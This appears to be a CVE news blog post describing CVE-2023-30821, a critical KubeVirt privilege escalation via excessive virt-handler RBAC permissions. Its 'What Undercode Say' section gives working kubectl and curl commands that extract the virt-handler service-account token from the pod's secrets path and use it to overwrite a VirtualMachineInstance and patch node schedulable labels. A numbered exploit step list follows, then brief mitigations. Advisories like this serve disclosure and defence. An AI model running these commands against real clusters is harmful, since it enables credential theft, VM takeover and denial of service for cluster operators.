KubeVirt, Privilege Escalation, CVE-2023-30821 (Critical)

By /

Listen to this Post

A compromised virt-handler service account can abuse its excessive Kubernetes RBAC permissions to manipulate node labels and VirtualMachineInstance (VMI) states. This allows an attacker to mark all other nodes as unschedulable for VMI workloads by patching the `kubevirt.io/schedulable` label to false. Concurrently, the attacker can inject incorrect data into a running VMI, such as altering its `kubevirt.io/nodeName` label, forcing it into a terminated state. When an administrator restarts the failed VMI, the Kubernetes scheduler is forced to place it on the only available node—the one controlled by the attacker. This exploits the virt-handler’s default permissions to update VMIs cluster-wide and patch nodes, bypassing intended restrictions because the NodeRestriction-like admission controller is not enabled by default.
Platform: KubeVirt
Version: Pre-1.0
Vulnerability: Privilege Escalation
Severity: Critical
date: 2023-03-23

Prediction: 2023-05-15

What Undercode Say:

kubectl get pods -n kubevirt --field-selector spec.nodeName=minikube-m03 | grep virt-handler
token=$(kubectl exec -it virt-handler-kblgh -n kubevirt -c virt-handler -- cat /var/run/secrets/kubernetes.io/serviceaccount/token)
curl https://192.168.49.2:8443/apis/kubevirt.io/v1/namespaces/default/virtualmachineinstances/testvm -k -X PUT -d @testvm.json -H "Content-Type: application/json" -H "Authorization: bearer $token"
curl https://192.168.49.2:8443/api/v1/nodes/minikube-m03 -k -H "Authorization: Bearer $token" -H "Content-Type: application/strategic-merge-patch+json" --data '{"metadata":{"labels":{"kubevirt.io/schedulable":"false"}}}' -X PATCH

How Exploit:

Compromise virt-handler pod.

Extract service account token.

Modify VMI nodeName label.

Patch node schedulable labels.

Trigger VMI reschedule.

Protection from this CVE:

Enable NodeRestriction admission.

Limit virt-handler RBAC.

Use dedicated service accounts.

Apply validating admission policies.

Impact:

Cluster-wide VM takeover.

Privilege escalation.

Denial of service.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top